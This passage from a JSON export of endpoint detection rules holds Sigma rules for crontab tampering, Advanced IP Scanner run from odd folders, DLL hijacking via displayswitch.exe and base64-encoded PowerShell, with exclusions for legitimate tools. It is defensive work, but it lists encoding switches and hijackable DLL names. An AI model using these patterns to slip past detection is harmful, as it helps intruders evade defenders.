exclusion_quest_amptools:\n # /opt/quest/kace/bin/AMPTools\n # /data/quest/kace/bin/AMPTools\n - ProcessParentImage|endswith: '/quest/kace/bin/AMPTools'\n - ProcessGrandparentImage|endswith: '/quest/kace/bin/AMPTools'\n\n exclusion_quest_ampctl:\n ProcessParentCommandLine|startswith: '/bin/sh /etc/init.d/ampctl '\n\n exclusion_quest_koneacheckercrontab:\n ProcessCommandLine|contains:\n - '/etc/cron.d/koneacheckercrontab'\n - '/opt/quest/kace/bin/koneacheckercrontab'\n\n exclusion_eset:\n - ProcessImage|startswith: '/opt/eset/'\n - ProcessParentImage|startswith: '/opt/eset/'\n - ProcessParentCommandLine|startswith: '/bin/sh /opt/eset/efs/lib/'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_kalilab:\n ProcessCommandLine|contains: '/var/www/kalilab/'\n\n exclusion_snap:\n ProcessImage|endswith: '/snap-update-ns'\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5046eefb-f36f-4d3a-a86e-0e7c3ddfcccc",
"rule_name": "Crontab-Related Files Modified",
"rule_description": "Detects a suspicious attempt to modify \"/etc/crontab\" or other crontab-related files.\nThese files contain scheduled tasks, usually run with root privileges, to help maintain the system.\nAn attacker could use these files to add malicious cron jobs for persistence.\nIt is recommended to check the modified crontab file for malicious content as well as to look for other suspicious actions related to the process responsible for this modification.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5048f6e6-e1a6-4d99-adae-e0fdb0ab4d43",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069811Z",
"creation_date": "2026-03-23T11:45:34.069813Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069817Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.advanced-ip-scanner.com/",
"https://www.bleepingcomputer.com/news/security/new-ymir-ransomware-partners-with-rustystealer-in-attacks/",
"https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
"https://attack.mitre.org/techniques/T1595/001/"
],
"name": "t1595_001_advanced_ip_scanner.yml",
"content": "title: Advanced IP Scanner Executed from a Suspicious Location\nid: 5048f6e6-e1a6-4d99-adae-e0fdb0ab4d43\ndescription: |\n Detects the execution of the Advanced IP Scanner tool in a suspicious location.\n Advanced IP Scanner is a network scanning and utilities tool used for various network-related tasks, including IP range scanning and data collection.\n Adversaries may use this tool to enumerate the network and aid in lateral movement.\n It is recommended to verify the legitimacy of its usage in the environment.\nreferences:\n - https://www.advanced-ip-scanner.com/\n - https://www.bleepingcomputer.com/news/security/new-ymir-ransomware-partners-with-rustystealer-in-attacks/\n - https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\n - https://attack.mitre.org/techniques/T1595/001/\ndate: 2025/11/03\nmodified: 2025/11/24\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1216.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.AdvancedIPScanner\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Company: 'Famatech Corp.'\n Product: 'Advanced IP Scanner'\n\n filter_legitimate:\n Image:\n - '?:\\Program Files (x86)\\Advanced IP Scanner*\\advanced_ip_scanner.exe'\n - '?:\\Program Files\\Advanced IP Scanner*\\advanced_ip_scanner.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\Advanced IP Scanner*\\advanced_ip_scanner.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*\\Advanced IP Scanner*\\advanced_ip_scanner.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Advanced IP Scanner*\\advanced_ip_scanner.exe'\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5048f6e6-e1a6-4d99-adae-e0fdb0ab4d43",
"rule_name": "Advanced IP Scanner Executed from a Suspicious Location",
"rule_description": "Detects the execution of the Advanced IP Scanner tool in a suspicious location.\nAdvanced IP Scanner is a network scanning and utilities tool used for various network-related tasks, including IP range scanning and data collection.\nAdversaries may use this tool to enumerate the network and aid in lateral movement.\nIt is recommended to verify the legitimacy of its usage in the environment.\n",
"rule_creation_date": "2025-11-03",
"rule_modified_date": "2025-11-24",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1216.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5060a37d-0510-4be7-b5ab-f0d8f36d2d3b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599404Z",
"creation_date": "2026-03-23T11:45:34.599408Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599420Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_displayswitch.yml",
"content": "title: DLL Hijacking via displayswitch.exe\nid: 5060a37d-0510-4be7-b5ab-f0d8f36d2d3b\ndescription: |\n Detects potential Windows DLL Hijacking via displayswitch.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'displayswitch.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\duser.dll'\n - '\\dwmapi.dll'\n - '\\policymanager.dll'\n - '\\UxTheme.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5060a37d-0510-4be7-b5ab-f0d8f36d2d3b",
"rule_name": "DLL Hijacking via displayswitch.exe",
"rule_description": "Detects potential Windows DLL Hijacking via displayswitch.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "506a49d4-0c48-4c47-a6bb-9c4dbfec663c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622910Z",
"creation_date": "2026-03-23T11:45:34.622912Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622917Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/threat-detection-report/techniques/powershell/",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1132/001/",
"https://attack.mitre.org/techniques/T1027/"
],
"name": "t1059_001_powershell_base64_cmd.yml",
"content": "title: PowerShell Base64 Encoded Command Execution\nid: 506a49d4-0c48-4c47-a6bb-9c4dbfec663c\ndescription: |\n Detects the execution of PowerShell launching a base64-encoded command.\n Attackers may encode their PowerShell command to bypass security tools that perform pattern matching on suspicious scripts.\n It is recommended to check the encoded command for malicious content (for instance by selecting the base64 payload, right clicking and selecting 'Decode base64') and to analyze the execution context of the PowerShell binary.\nreferences:\n - https://redcanary.com/threat-detection-report/techniques/powershell/\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1132/001/\n - https://attack.mitre.org/techniques/T1027/\ndate: 2021/04/13\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.command_and_control\n - attack.t1132.001\n - attack.defense_evasion\n - attack.t1027\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Obfuscation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_process:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n\n selection_cmd:\n CommandLine|contains:\n - ' -e '\n - ' -ec '\n - ' -en '\n - ' -enc '\n - ' -enco '\n - ' -encod '\n - ' -encode '\n - ' -encoded '\n - ' -encodedc '\n - ' -encodedco '\n - ' -encodedcom '\n - ' -encodedcomm '\n - ' -encodedcomma '\n - ' -encodedcomman '\n - ' -encodedcommand '\n - ' /e '\n - ' /ec '\n - ' /en '\n - ' /enc '\n - ' /enco '\n - ' /encod '\n - ' /encode '\n - ' /encoded '\n - ' /encodedc '\n - ' /encodedco '\n - ' /encodedcom '\n - ' /encodedcomm '\n - ' /encodedcomma '\n - ' /encodedcomman '\n - ' /encodedcommand '\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: 
'?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_sigilium:\n ParentImage|endswith:\n - ':\\Program Files\\sigilium-plugin\\app-*\\Sigilium Email Signatures.exe'\n - '\\AppData\\Local\\Programs\\sigilium-plugin\\Sigilium Email Signatures.exe'\n GrandparentImage|endswith:\n - ':\\Program Files\\sigilium-plugin\\app-*\\Sigilium Email Signatures.exe'\n - '\\AppData\\Local\\Programs\\sigilium-plugin\\Sigilium Email Signatures.exe'\n\n exclusion_azuread:\n ParentImage:\n - '?:\\Program Files\\Azure Ad Connect Health Adfs Agent\\Insights\\Microsoft.Identity.Health.Adfs.InsightsService.exe'\n - '?:\\Program Files\\Microsoft Azure AD Connect Health Agent\\Microsoft.Identity.Health.AgentV??.Service.exe'\n\n exclusion_vscode:\n ParentImage:\n - '*\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n - '?:\\Program Files\\Microsoft VS Code\\Code.exe'\n GrandparentImage:\n - '*\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n - '?:\\Program Files\\Microsoft VS Code\\Code.exe'\n\n exclusion_glpi:\n GrandparentImage: '?:\\Program Files\\GLPI-Agent\\perl\\bin\\glpi-agent.exe'\n # CurrentDirectory: '?:\\Program Files\\GLPI-Agent\\perl\\bin' # too many different seen\n\n # https://www.chadduffey.com/2020/06/Ansible-PowerShell.html\n exclusion_ansible1:\n ParentImage: '?:\\Windows\\System32\\cmd.exe'\n GrandparentImage: '?:\\Windows\\System32\\winrshost.exe'\n CommandLine:\n - 'PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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'\n - 'PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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'\n\n exclusion_ansible2:\n ParentImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n GrandparentImage: '?:\\Windows\\System32\\cmd.exe'\n CommandLine:\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -NonInteractive 
-ExecutionPolicy Unrestricted -EncodedCommand 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'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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'\n\n exclusion_ansible3:\n CommandLine|contains:\n - ' -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZ'\n - ' -EncodedCommand CgAgACAAIAAgACYAYwBoAGMAcAAuAGMAbwBtACAANgA1ADAAMAAxACAAPgAgACQAbgB1AGwAbAAKACAAIAAgACAAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQAKACAAIAAgACAAJABzAHAAbABpAHQAXwBwAGEAcgB0AHMAIAA9ACAAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdABy'\n\n exclusion_azureconnected:\n ParentImage:\n - '?:\\Program Files\\AzureConnectedMachineAgent\\GCArcService\\GC\\gc_worker.exe'\n - '?:\\Program Files\\AzureConnectedMachineAgent\\GCArcService2\\GC\\gc_worker.exe'\n - '?:\\Program Files\\AzureConnectedMachineAgent\\ExtensionService\\GC\\gc_extension_service.exe'\n - '?:\\Program Files\\AzureConnectedMachineAgent\\ExtensionService2\\GC\\gc_extension_service.exe'\n\n exclusion_nodejs:\n # C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell -NoProfile -NonInteractive –ExecutionPolicy Bypass -EncodedCommand UwB0AGEAcgB0ACAAIgBoAHQAdABwADoALwAvAGwAbwBjAGEAbABoAG8AcwB0ADoAMwAwADAAMAAiAA==\n # ==> Start \"http://localhost:3000\"\n # powershell -NoProfile -NonInteractive –ExecutionPolicy Bypass -EncodedCommand UwB0AGEAcgB0ACAAIgBgACIAaAB0AHQAcAA6AC8ALwBsAG8AYwBhAGwAaABvAHMAdAA6ADQAMgAwADAALwBgACIAIgA=\n # ==> Start 
\"`\"http://localhost:4200/`\"\"\n ParentImage|endswith: '\\node.exe'\n CommandLine|contains:\n - 'UwB0AGEAcgB0ACAAIgBoAHQAdABwADoALwAvAGwAbwBjAGEAbABoAG8Ac'\n - 'UwB0AGEAcgB0ACAAIgBgACIAaAB0AHQAcAA6AC8AL'\n\n exclusion_recoveryconsole:\n ParentImage: '?:\\Program Files\\RecoveryConsole\\RecoveryConsole.exe'\n CommandLine: 'powershell.exe -EncodedCommand aQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAzACkAIAB7ACAAZQB4AGkAdAAgADIANwAgAH0AJABtAG8AZAB1AGwAZQA9AEcAZQB0AC0ATQBvAGQAdQBsAGUAIAAtAEwAaQBzAHQAQQB2AGEAaQBsAGEAYgBsAGUAIABBAFcAUwBQAG8AdwBlAHIAUwBoAGUAbABsADsAIABpAGYAKAAkAG0AbwBkAHUAbABlACkAIAB7ACAAIAAgAGkAZgAoACQAbQBvAGQAdQBsAGUALgBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAzACkAIAB7ACAAZQB4AGkAdAAgADIANgAgAH0AOwAgACAAIABlAHgAaQB0ACAAMAAgAH0AIABlAGwAcwBlACAAewAgAGUAeABpAHQAIAAxADEAIAB9ADsA'\n\n exclusion_centreon:\n # https://github.com/centreon/centreon-plugins/blob/master/centreon/common/powershell/windows/pendingreboot.pm\n ParentCommandLine|contains|all:\n - '/centreon_plugins.exe '\n - ' --plugin'\n GrandparentImage|endswith: '\\centreon_plugins.exe'\n\n exclusion_applocker:\n CommandLine|startswith:\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -NonInteractive -NoProfile -ExecutionPolicy RemoteSigned -EncodedCommand cABhAHIAYQBtACAAKAAKACAAIAAgACAAWwBzAHcAaQB0AGMAaABdACAAJABDAGgA ZQBjAGsAQwBvAG0AcABsAGkAYQBuAGMAZQBPAG4AbAB5ACAAPQAgACQAZgBhAGwA cwBlAAoACQApAAoACgBbAFMAeQBzAHQAZQBtAC4ASQBuAHQAMwAyAF0AJABwAG8A '\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -NonInteractive -NoProfile -ExecutionPolicy RemoteSigned -EncodedCommand JgAgAHsAcABhAHIAYQBtACAAKAAKACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUA cgAoAE0AYQBuAGQAYQB0AG8AcgB5ACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkA XQBbAHMAdAByAGkAbgBnAF0AIAAkAEkAbgBwAHUAdABYAG0AbAAsAAoAIAAgACAA '\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -NonInteractive -NoProfile -ExecutionPolicy RemoteSigned 
-EncodedCommand JgAgAHsAcABhAHIAYQBtACAAKAAKACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUA cgAoAE0AYQBuAGQAYQB0AG8AcgB5ACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkA XQBbAHMAdAByAGkAbgBnAF0AIAAkAEQAZQB2AEcAdQBhAHIAZABQAGEAdABoACwA '\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -NonInteractive -NoProfile -ExecutionPolicy RemoteSigned -EncodedCommand JgAgAHsAcABhAHIAYQBtACAAKAAKACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUA cgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQA aQBvAG4APQAwACkAXQBbAHMAdAByAGkAbgBnAF0AIAAkAEMAYwBtAEUAeABlAGMA '\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -NonInteractive -NoProfile -ExecutionPolicy RemoteSigned -EncodedCommand JgAgAHsAcABhAHIAYQBtACAAKAAKACAAIAAgACAAWwBzAHcAaQB0AGMAaABdACAA JABDAGgAZQBjAGsAQwBvAG0AcABsAGkAYQBuAGMAZQBPAG4AbAB5ACAAPQAgACQA ZgBhAGwAcwBlAAoACQApAAoACgBbAFMAeQBzAHQAZQBtAC4ASQBuAHQAMwAyAF0A '\n ParentImage: '?:\\Windows\\CCM\\CcmExec.exe'\n\n exclusion_prtg:\n CommandLine|startswith: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -encodedCommand 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'\n\n exclusion_ivanti:\n ParentImage:\n - '?:\\Program Files\\LANDesk\\LDClient\\sdistps1.exe'\n - '?:\\Program Files (x86)\\LANDesk\\LDClient\\sdistps1.exe'\n GrandparentImage:\n - '?:\\Program Files\\LANDesk\\LDClient\\SDCLIENT.EXE'\n - '?:\\Program Files (x86)\\LANDesk\\LDClient\\SDCLIENT.EXE'\n\n exclusion_microsoft_cloud_agent:\n ParentImage: '?:\\Program Files\\Microsoft Cloud Managed Desktop Extension\\CMDExtension\\Microsoft.Management.Services.CloudManagedDesktop.Agent.exe'\n GrandparentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_polylens:\n CommandLine|startswith: '?:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell -NoProfile -NonInteractive –ExecutionPolicy Bypass -EncodedCommand UwB0AGEAcgB0ACAAIgBgACIAQwA6AFwAVQBzAGUAcgBzAFwA'\n ParentImage|endswith: '\\AppData\\Local\\Programs\\oz-client\\Poly Lens.exe'\n GrandparentImage|endswith: 
'\\AppData\\Local\\Programs\\oz-client\\Poly Lens.exe'\n\n exclusion_waptpython:\n GrandparentImage|endswith:\n - '\\waptpython.exe'\n - '\\waptpythonw.exe'\n GrandparentCommandLine|contains:\n - 'waptservice\\service.py'\n - '\\wapt\\wapt-get.py session-setup'\n CommandLine|startswith: 'powershell -NoLogo -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -OutputFormat text -EncodedCommand '\n\n exclusion_waptget:\n GrandparentImage:\n - '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n - '?:\\wapt\\wapt-get.exe'\n CommandLine|startswith: '?:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoLogo -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -OutputFormat text -EncodedCommand '\n\n exclusion_nutanix:\n - ParentImage: '?:\\Program Files\\Nutanix\\Python3?\\python.exe'\n GrandparentImage: '?:\\Program Files\\Nutanix\\Python3?\\Lib\\site-packages\\win32\\pythonservice.exe'\n - ParentImage: '?:\\Program Files\\Nutanix\\Python3?\\Lib\\site-packages\\win32\\pythonservice.exe'\n CommandLine:\n - 'powershell.exe -NoProfile -EncodedCommand RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAC0ATgBhAG0AZQBzAHAAYQBjAGUAIAByAG8AbwB0AFwAdwBtAGkAIAAtAEMAbABhAHMAcwAgAE0AUwBpAFMAQwBTAEkASQBuAGkAdABpAGEAdABvAHIAXwBTAGUAbgBkAFQAYQByAGcAZQB0AFAAbwByAHQAYQBsAEMAbABhAHMAcwAgAHwAIABGAG8AcgBlAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAAVwByAGkAdABlAC0ASABvAHMAdAAgACQAXwAuAFAAbwByAHQAYQBsAEEAZABkAHIAZQBzAHMAIAB9AA=='\n - 'powershell.exe -NoProfile -EncodedCommand VwByAGkAdABlAC0ASABvAHMAdAAgACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAC0ATgBhAG0AZQBzAHAAYQBjAGUAIAByAG8AbwB0AFwAdwBtAGkAIAAtAEMAbABhAHMAcwAgAE0AUwBpAFMAQwBTAEkASQBuAGkAdABpAGEAdABvAHIAXwBNAGUAdABoAG8AZABDAGwAYQBzAHMAKQAuAGkAUwBDAFMASQBOAG8AZABlAE4AYQBtAGUA'\n - ProcessParentImage|endswith: '\\nutanix\\move\\\\*\\move-service.exe'\n\n exclusion_rgsupervision:\n GrandparentImage: '?:\\Program Files (x86)\\RG-Supervision\\RG_Supervision.exe'\n\n exclusion_dbeaver:\n GrandparentImage:\n - '?:\\Program 
Files\\DBeaver\\dbeaver.exe'\n - '?:\\Program Files (x86)\\DBeaver\\dbeaver.exe'\n\n exclusion_programfiles:\n - ProcessParentImage|startswith:\n - '?:\\program files\\'\n - '?:\\program files (x86)\\'\n - ProcessGrandparentImage|startswith:\n - '?:\\program files\\'\n - '?:\\program files (x86)\\'\n\n # ServiceNav and Ansible\n exclusion_winrshost:\n ProcessParentCommandLine|startswith:\n - '?:\\Windows\\system32\\cmd.exe /C powershell -encodedcommand '\n - '?:\\Windows\\system32\\cmd.exe /C powershell.exe -EncodedCommand '\n - '?:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand '\n ProcessAncestors: '?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\winrshost.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_quest:\n CommandLine|contains: ' -encodedCommand 